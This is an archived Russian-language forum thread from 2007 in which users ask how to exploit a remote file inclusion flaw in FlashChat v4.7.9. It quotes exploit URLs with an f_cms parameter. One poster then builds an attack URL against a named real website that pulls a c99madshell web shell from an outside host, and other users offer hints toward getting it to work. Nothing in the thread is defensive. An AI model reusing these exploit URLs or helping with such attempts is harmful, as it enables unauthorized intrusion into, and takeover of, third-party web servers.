PDA

Просмотр полной версии : Есть уязвимость в FlashChat v 4.7.9. Как использовать?


Nefix
12.10.2007, 10:24
Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)

.Slip
12.10.2007, 12:19
Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)
Лучше скинь ссылку, я не могу понять что у тебя не получается. А то ты просто переписал багтрак.

Nefix
12.10.2007, 16:48
ну допустим чат здесь: http://www.pesleague.com/forum/chat/flashchat.php
шелл здесь: http://burny.fromru.com/c99madshell.php

итоге получается http://www.pesleague.com/forum/chat/incclasses/connection.php?f_cms=http://burny.fromru.com/c99madshell.php
и как я понял получившаяся ссылка должна запустить шелл на pc-center.com.ua... но ничего не получается :(
или я все неправильно делаю и не так понял?

Nefix
15.10.2007, 11:33
:(

Rebz
15.10.2007, 11:57
Nefix,
а ты зайди по адресу h__p://www.pesleague.com/forum/chat/incclasses/connection.php и сам думаю догадаешься..

Nightmarе
15.10.2007, 15:25
действительно объясните как юзать баги